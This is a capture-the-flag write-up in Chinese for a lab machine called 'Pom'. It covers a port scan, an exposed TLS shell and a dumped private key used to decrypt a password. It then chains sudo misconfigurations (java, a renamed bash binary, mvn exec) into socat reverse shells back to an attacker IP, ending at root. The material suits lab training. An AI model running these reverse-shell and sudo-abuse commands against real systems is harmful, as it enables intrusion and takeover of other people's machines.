![Pom[MazeSec]](https://gitlab.com/aristorechina/blog_imgur/-/raw/main/2025/ctf_writeup_cover_2dcbf3013efda15f.gif)
信息收集
cmd
rustscan -a 192.168.31.135 --ulimit 5000 -- -sV -sC.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'The Modern Day Port Scanner.________________________________________: http://discord.skerritt.blog :: https://github.com/RustScan/RustScan : --------------------------------------Real hackers hack time ⌛ [~] The config file is expected to be at "C:\\Users\\Administrator\\.rustscan.toml"Open 192.168.31.135:22Open 192.168.31.135:80Open 192.168.31.135:55555[~] Starting Script(s)[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sV -sC" on ip 192.168.31.135Depending on the complexity of the script, results may take some time to appear.[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-05-01 17:47 +0800NSE: Loaded 158 scripts for scanning.NSE: Script Pre-scanning.NSE: Starting runlevel 1 (of 3) scan.Initiating NSE at 17:47Completed NSE at 17:47, 0.01s elapsedNSE: Starting runlevel 2 (of 3) scan.Initiating NSE at 17:47Completed NSE at 17:47, 0.00s elapsedNSE: Starting runlevel 3 (of 3) scan.Initiating NSE at 17:47Completed NSE at 17:47, 0.00s elapsedInitiating ARP Ping Scan at 17:47Scanning 192.168.31.135 [1 port]Completed ARP Ping Scan at 17:47, 1.42s elapsed (1 total hosts)Nmap scan report for 192.168.31.135 [host down, received no-response]NSE: Script Post-scanning.NSE: Starting runlevel 1 (of 3) scan.Initiating NSE at 17:47Completed NSE at 17:47, 0.00s elapsedNSE: Starting runlevel 2 (of 3) scan.Initiating NSE at 17:47Completed NSE at 17:47, 0.00s elapsedNSE: Starting runlevel 3 (of 3) scan.Initiating NSE at 17:47Completed NSE at 17:47, 0.00s elapsedRead data files from: D:\NmapNote: Host seems down. If it is really up, but blocking our ping probes, try -PnNmap done: 1 IP address (0 hosts up) scanned in 2.26 seconds Raw packets sent: 2 (56B) | Rcvd: 0 (0B)55555 端口是直接暴露的 TLS shell,已经以 mav1234 用户身份登录
bash
┌──(root㉿kali)-[~]└─# openssl s_client -quiet -connect $IP:55555 2>/dev/nullsh-5.2$ ididuid=1000(mav1234) gid=1000(mav1234) groups=1000(mav1234)sh-5.2$ lslsjournel user.txtsh-5.2$ cat user.txtcat user.txtflag{user-f823e147843dd5b23f0ac9d243ae12fb}sh-5.2$ 横向移动到 qc2000
读取当前目录下的另一个文件
bash
sh-5.2$ cat journelI’ve encrypted my secret with my key. No one else can read it now. It’s safely hidden away:)检查 SUID 文件
bash
sh-5.2$ find / -perm -4000 -o -perm -2000 2>/dev/null/home/mav1234/.local/bin/bbsuid/usr/bin/expiry/usr/bin/chsh/usr/bin/chage/usr/bin/passwd/usr/bin/gpasswd/usr/bin/sudo/usr/bin/chfn/usr/sbin/unix_chkpwd/usr/sbin/suexec/var/lib/caddy/var/log/apache2发现隐藏文件夹 /home/mav1234/.local
bash
sh-5.2$ ls -latotal 20drwxr-sr-x 2 mav1234 mav1234 4096 Feb 26 15:48 .drwx------ 4 mav1234 mav1234 4096 May 1 21:25 ..-rw-r--r-- 1 mav1234 mav1234 512 Feb 26 15:48 maven.meta-rw------- 1 mav1234 mav1234 5285 Feb 26 15:20 ssl.pemjournel 说用 key 加密了 secret,推测 ssl.pem 是解密 maven.meta 的 key
bash
sh-5.2$ cat /home/mav1234/.local/ssl.pem-----BEGIN PRIVATE KEY-----MIIJQgIBADANBgkqhkiG9w0BAQEFAASCCSwwggkoAgEAAoICAQDylEQQUsAPSo6YTElEnKXxIQ6utctm6EVM7AZKMb8FpkRymjIwHXnchsIClpzxVnone92ZP8APFhkXGTU9JQhc4Zk5KPYgRQMwpLvZj8vqM5b3Vr8/3K7pAeUW9b2cB6deg28AQBviUEMJM1ZhMfIlnZh7reBx5GI+6HvRVlD5Xg73zFdvj+JLX9QRLEaUWKIEs35wwEyNp99aXQVoTGmPfvUOP8IejpBaDA/YD/1JMqiUOyxlVg48pNaNcItvPDJ63PuueXHXReTF47E+ly0uC1GPZJiVfmQRY6M+Rawsl0gc12xEpbybU+ZKwXdXLbOESHf1HEFYaSLt/AsvhuS+U6A1S8OWzcJDPMaa+Na4lks40ThhIbL5gpNNvLAVnGqSrN/XdQxXEqMnrGu6nju0260eWvcyl7qZZ/YEbguuNMs643fkxaDG9P323ZE4BmKevLA3b062Vmjd0AmvPTKFw2GY6AY1XdIP9EHSePaTA1KgXaowUBybK+gnOFUWWjI6ngWLUQjO+nCinMjlgG/URYHPIybdYTBvPS2aQ18tYPKlCdoQNvWEhIYYKroKpfr3WHANuAySJfp5OmcGz9p5EOTU0oOl0LSqC42zck1eWT/qLDppvJrrqxCS/x1k2SplkQx50ohnkwr0MtaNDFqm1HJDfnSGliHMGYSliYwgDwIDAQABAoICAEfsC84nKsid229uVt7f7xdyLK9COV92iG2JIUhIPZHIPU0ZSL4ZTzNCRS2NSFUJxcgFIqu4ShJvA9tkXvOVEkivnsVizq68p3h5rzSPPO9ggmctMiEWJknxhOHs1F35qvcL0xJo75uHHokQzpCcxWW/tyEcaYp7I2HxfhyQEgwNhjSUQmxSZc7hR7gbv4VmTgtEyL1XVps9ZayeHedRmI6yHqgt4Tk8HbKFFwGBpCBaw77HWJ9nB2uVmANxlfXSDEl/UaPmYAlqsKy3mKqtGfkn4/O26MKSKcs6FoF1GNpTtE7Q1En6NdR76LDLcb3IUAxtjBuBWCKFcZTMAOkDfrgXudJXhZv2gB/G/GNgemkHso0+KVDUmNilA9M2mCH1kZndQXb+EJreCIILnexO+7/Bf2JG2SMZdIwBO8Rqr5rGvyNNNte+H7Pk/2CsHkOxJQdcuCYAIgVOWuDE3GJboDzYrqKB4mpM3jgrXzCEKsIKLibOdntGY8lZl1xZ5nvF5zAjwASKEI+9heo5k5wx9ualL/C0jca+zBlfH7PO5JkPj+Lf53n0+xVthNAN0G4IoBRrknxQhK+mh0fq/gE4F31ERwZZ2PKRciVlaIH7XPPg9FSJEqn7xWiKzWoOCeXdkN/dDatY38UBqToTU3xQbmMhzpy9hbFJx6BI5/QtyzMZAoIBAQD9oHjRsSTOen3NoAkkD/SKbSk73wsNsQWIcxIa1JbTlutoHPgr0DA+nk6Kn//1VDBq1Bflv1qJeEWRMn5z4ACKpDTZcm42SsaFS/HlONk16QOJYZ+XRJqBz/c776j0OmSKqtkOQvfXP2u6BQQAMG3J79odo69yRjHGWNcELx+PGHVJ62loOMFW8Nxq7l8qqAX0jTX/Jfoa4AimHPNDD1fuPwLzoels1CFmvirincDzGRdkaW6Z22DiKMXcpMR8s6IKKYz9yhy3JbZqxVcjKOGFmLQz2krZ/XDOxa4Pm4+/VMTXrXbRQhz5KAonoKHXkSuHk562Le0t3a5WfIbfMTW1AoIBAQD02VSq+ka6yIZuRAl112l+j010xgCWfs7Cj73cIAX9C10wPmIGqvqrw9Dy5NQCZnJw1S5f4fU+STY87KIm9vkV/U+8BkRxfTWxYahHV581HwXNHci7YkuSMZhjrqI43J1Q9l4+pK978nLGS1pe2wL4bnKONtUEDpD0qycHaKVoSj2MsvTj1M/cXb84AihZ+2P3x9GCWu8Ln01zGMg4ZEgenuPl1jYyti2hvKDmItnYAepW7jXJAPUKO57PVwoiBtIF3xF8iq4uiVdeCk8BGIItThpgd5WSS9g27DjM7+ILsCqIoWT3Pzs1Dm8kScBqXBwpjSZyecJ0LWArS0wOWNkzAoIBAQDcoaNYruQY5n/Xx7cL8wFFBi8PkTj5YRwyFgAS7QqD6E7ClCjjXEkLwAUNHKC6FtHDrNtZFjw5SDIkXCuau6tc7/m1i5EKk8PcozM7t1dlSV21PgJpwdkyweoN7q8oPj/GTVdiy6j0S4x4FvLjAz4OpCM3E3SFUUDtjc0GK8QlZB5r/mkErBKsgf0M3G5XGjGMCueFHNFUXb3IW3jWxls0uwXjUN9Rt7uSuC1wU9FM6G/r/rejCi9erh9pkMAIxu9YLcsj35VZUWo9uYvS3zZIVI22adghiBKBHYAMvcOvqptOD+1DnmK78DPdQyRm9TdLyoQPcSZZdvW48L0XHaTdAoIBAB8cKhTbXfdHmUUTYfxWFXJeNOI8ckCs9gpkhyQb8YbYVcvWcVAVk2oVpEvoZUO0zp+lhpHqPOXgGYMeMfAvezCfEe17AmFFHnheRyphaLowKeWI/kNI1v9JS+qGetgst9RcqVbeR+nAwXKOinn46+Sy691D/EbarvJXeMsJMdMRc8aXymPUW2DNjIlKRORB+8601drxQORCJm4UXQRFQaCaYayHTjWdTij5tZvoG7PFcof/Flhmxbu6HZCMp53xLehPEoK3gDArhS1OtAEYoxmsjc9qAlgnSN6ZnxHy/M6tYIohr5l2sEgqgFalBEy/TVi+NX9gFyP5y/lUROKhyV8CggEAVbD0wfhaubtIUAoqrgv3fL8D53a0lD0meWjmWnX7q5K/qja/q0XQJzSVLlqkScZ8fFr2a9ejiEjFQiWPJmEPyg3oCI/6gDk2iHNsD8HCLcuBToe4be86vmGL28qwZ+oYMJ3u1pcL3VnM97v6awVG8T1GHFdTLbUZonVh/O9qjO/Z1iNj96NSGXx9t5NsctBqNuwTwlgMmC+vBNVmqwg40xAeB0pyrrkeY72C0pjz33TAm/UMVEzaq7j07y4w1VxN0woUfwRirq+0uVEXCvfP5Xa9U9YQfo6DANrj2pEsUnZVZ0W0iqzUMBHmTHu1nOeMB4vEAtMz7uFtRkDCDCOPiw==-----END PRIVATE KEY----------BEGIN CERTIFICATE-----MIIFoTCCA4mgAwIBAgIUVLyuh/l5EdN2c47Y0L//ePAO7GYwDQYJKoZIhvcNAQELBQAwYDELMAkGA1UEBhMCVVMxDjAMBgNVBAgMBVN0YXRlMQ0wCwYDVQQHDARDaXR5MQ4wDAYDVQQKDAVNYXZlbjEOMAwGA1UECwwFUHJveHkxEjAQBgNVBAMMCWxvY2FsaG9zdDAeFw0yNjAyMjYwNzIwNDhaFw0zNjAyMjQwNzIwNDhaMGAxCzAJBgNVBAYTAlVTMQ4wDAYDVQQIDAVTdGF0ZTENMAsGA1UEBwwEQ2l0eTEOMAwGA1UECgwFTWF2ZW4xDjAMBgNVBAsMBVByb3h5MRIwEAYDVQQDDAlsb2NhbGhvc3QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDylEQQUsAPSo6YTElEnKXxIQ6utctm6EVMsh-5.2$ cat ssl.pem-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY----------BEGIN CERTIFICATE-----MIIFoTCCA4mgAwIBAgIUVLyuh/l5EdN2c47Y0L//ePAO7GYwDQYJKoZIhvcNAQELBQAwYDELMAkGA1UEBhMCVVMxDjAMBgNVBAgMBVN0YXRlMQ0wCwYDVQQHDARDaXR5MQ4wDAYDVQQKDAVNYXZlbjEOMAwGA1UECwwFUHJveHkxEjAQBgNVBAMMCWxvY2FsaG9zdDAeFw0yNjAyMjYwNzIwNDhaFw0zNjAyMjQwNzIwNDhaMGAxCzAJBgNVBAYTAlVTMQ4wDAYDVQQIDAVTdGF0ZTENMAsGA1UEBwwEQ2l0eTEOMAwGA1UECgwFTWF2ZW4xDjAMBgNVBAsMBVByb3h5MRIwEAYDVQQDDAlsb2NhbGhvc3QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDylEQQUsAPSo6YTElEnKXxIQ6utctm6EVM7AZKMb8FpkRymjIwHXnchsIClpzxVnone92ZP8APFhkXGTU9JQhc4Zk5KPYgRQMwpLvZj8vqM5b3Vr8/3K7pAeUW9b2cB6deg28AQBviUEMJM1ZhMfIlnZh7reBx5GI+6HvRVlD5Xg73zFdvj+JLX9QRLEaUWKIEs35wwEyNp99aXQVoTGmPfvUOP8IejpBaDA/YD/1JMqiUOyxlVg48pNaNcItvPDJ63PuueXHXReTF47E+ly0uC1GPZJiVfmQRY6M+Rawsl0gc12xEpbybU+ZKwXdXLbOESHf1HEFYaSLt/AsvhuS+U6A1S8OWzcJDPMaa+Na4lks40ThhIbL5gpNNvLAVnGqSrN/XdQxXEqMnrGu6nju0260eWvcyl7qZZ/YEbguuNMs643fkxaDG9P323ZE4BmKevLA3b062Vmjd0AmvPTKFw2GY6AY1XdIP9EHSePaTA1KgXaowUBybK+gnOFUWWjI6ngWLUQjO+nCinMjlgG/URYHPIybdYTBvPS2aQ18tYPKlCdoQNvWEhIYYKroKpfr3WHANuAySJfp5OmcGz9p5EOTU0oOl0LSqC42zck1eWT/qLDppvJrrqxCS/x1k2SplkQx50ohnkwr0MtaNDFqm1HJDfnSGliHMGYSliYwgDwIDAQABo1MwUTAdBgNVHQ4EFgQU9/xnvtfBkD4TGxnNgjoDSQXG1tAwHwYDVR0jBBgwFoAU9/xnvtfBkD4TGxnNgjoDSQXG1tAwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAgEAuOVYZ8E3uOVBdnMrUQuGDFP6ZNGvyAmNMp842QxL8g8r8K5SNo/JHhBf8CkY2BJG15l01/Ic6g56DqzTsQjfmwQAjfnqVWyHwcp9KSj9XdE3V39QO1ZGgICStAW0n3TXAa1jRn+GHcz7SZyTB9jGOqh1aAOrAH6/RsdfXBsBpesbeMAHhD2oJdMl45Bkl3dW8FruNP/CAde8vpPR0AQmsHy/2a5m7dcsCK39JgroLyhPJGFdHi698agrn5d1vNwzpfQRmu9Iw6Bk/0W5U8jlFYMZu+fK2rzA06o696GZumbchDHhsi7Ajoa+RYTEXqbyU9a2KDnm3OZC5R5WQY/d+BVnjRmefPWv8kqa5gJ0FGoYCMiR8PY0dpH9wKm4IwxsQAIOe3S2VuEaI6ceRO7Yq/FS31addb+B3UjVpWm7+WDDjsEKXY7jxjqWk7Lq3Rh1bTMDR4fxFVhXLish3vQfDA8xSZrGCRaqurwMAzjwR2b2GkKVaUVgMJ/8W1kupoJAjr63JIhzmCz3Ciq9/uwgpLFqHhMn1ooBKToUrWXPT5PXKEFHODfP+uj9NP8aTxrevJ1SCX7e0S6UO61J0Zjmk7jY+L6ke5blKGiV9NYsvoozjwwRKzAxR95V8TVCy4gNa5ViLG6FcXQ1hLDdfMfRTfuMrYvTtiqhWVvdTgrwK04=-----END CERTIFICATE-----ssl.pem 里包含私钥和证书,而这个证书的 Subject 和 Issuer 都是 Maven / Proxy,和 maven.meta 文件名呼应
bash
sh-5.2$ openssl pkeyutl -decrypt -inkey /home/mav1234/.local/ssl.pem -in /home/mav1234/.local/maven.meta 2>&1MvxPf8yCB8lxXk5A得到 mav1234 的密码 MvxPf8yCB8lxXk5Ash
bash
sh-5.2$ sudo -l[sudo] password for mav1234: Matching Defaults entries for mav1234 on Pom: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for mav1234: Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL" User mav1234 may run the following commands on Pom: (qc2000) PASSWD: /usr/bin/java发现可以用 sudo -u qc2000 /usr/bin/java 来以 qc2000 用户执行 Java,Java 可以执行系统命令,用它来获得 qc2000 的 shell
利用 Java 横向到 qc2000,用 socat 做 PTY 反弹 shell
bash
sh-5.2$ echo 'public class Rev { public static void main(String[] args) throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", "socat tcp:192.168.31.58:4444 exec:/bin/sh,pty,stderr,setsid,sigint,sane"}); p.waitFor(); } }' > /tmp/Rev.javash-5.2$ sudo -u qc2000 /usr/bin/java /tmp/Rev.javabash
┌──(root㉿kali)-[~]└─# socat file:`tty`,raw,echo=0 tcp-listen:4444sh-5.2$ iduid=1001(qc2000) gid=1001(qc2000) groups=1001(qc2000)横向移动到 terra536
bash
sh-5.2$ sudo -lMatching Defaults entries for qc2000 on Pom: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for qc2000: Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL" User qc2000 may run the following commands on Pom: (terra536) NOPASSWD: /home/terra536/ln发现 qc2000 可以以 terra536 身份无密码执行 /home/terra536/ln,先看看这个 ln 是什么:
bash
sh-5.2$ sudo -u terra536 /home/terra536/ln --help 2>&1GNU bash, version 5.2.37(1)-release-(x86_64-alpine-linux-musl)Usage: /home/terra536/ln [GNU long option] [option] ... /home/terra536/ln [GNU long option] [option] script-file ...GNU long options: --debug --debugger --dump-po-strings --dump-strings --help --init-file --login --noediting --noprofile --norc --posix --pretty-print --rcfile --restricted --verbose --versionShell options: -ilrsD or -c command or -O shopt_option (invocation only) -abefhkmnptuvxBCEHPT or -o optionType `/home/terra536/ln -c "help set"' for more information about shell options.Type `/home/terra536/ln -c help' for more information about shell builtin commands.Use the `bashbug' command to report bugs. bash home page: <http://www.gnu.org/software/bash>General help using GNU software: <http://www.gnu.org/gethelp/>发现它指向了一个 bash shell 程序,这意味着可以用 sudo -u terra536 /home/terra536/ln 执行任意 bash 命令
用 socat 反弹一个 terra536 的 shell
bash
sh-5.2$ sudo -u terra536 /home/terra536/ln -c "socat tcp:192.168.31.58:4445 exec:/bin/sh,pty,stderr,setsid,sigint,sane"bash
┌──(root㉿kali)-[~]└─# socat file:`tty`,raw,echo=0 tcp-listen:4445sh-5.2$ iduid=1002(terra536) gid=1002(terra536) groups=1002(terra536)提权
bash
sh-5.2$ sudo -lMatching Defaults entries for terra536 on Pom: secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin Runas and Command-specific defaults for terra536: Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL" User terra536 may run the following commands on Pom: (ALL) NOPASSWD: /usr/bin/mvn发现 terra536 可以以 root 身份无密码执行 /usr/bin/mvn,尝试用它提权到 root:
bash
sh-5.2$ sudo /usr/bin/mvn -q exec:exec -Dexec.executable=/bin/sh -Dexec.args="-c 'socat tcp:192.168.31.58:4446 exec:/bin/sh,pty,stderr,setsid,sigint,sane'"[ERROR] Failed to execute goal org.codehaus.mojo:exec-maven-plugin:3.6.3:exec (default-cli): Goal requires a project to execute but there is no POM in this directory (/home/mav1234/.local). Please verify you invoked Maven from the correct directory. -> [Help 1][ERROR] [ERROR] To see the full stack trace of the errors, re-run Maven with the -e switch.[ERROR] Re-run Maven using the -X switch to enable full debug logging.[ERROR] [ERROR] For more information about the errors and possible solutions, please read the following articles:[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MissingProjectException发现失败了,Maven 需要从有 POM 的目录运行
bash
sh-5.2$ cd /dev/shmsh-5.2$ cat > pom.xml << 'EOF'<project> <modelVersion>4.0.0</modelVersion> <groupId>exploit</groupId> <artifactId>exploit</artifactId> <version>1</version></project>EOFsh-5.2$ sudo /usr/bin/mvn -q exec:exec -Dexec.executable=/bin/sh -Dexec.args="-c 'socat tcp:192.168.31.58:4446 exec:/bin/sh,pty,stderr,setsid,sigint,sane'"bash
┌──(root㉿kali)-[~]└─# socat file:`tty`,raw,echo=0 tcp-listen:4446sh-5.2# iduid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)sh-5.2# cat /root/root.txtflag{root-4a29b2f65b40052a804c0cc4afb906bd}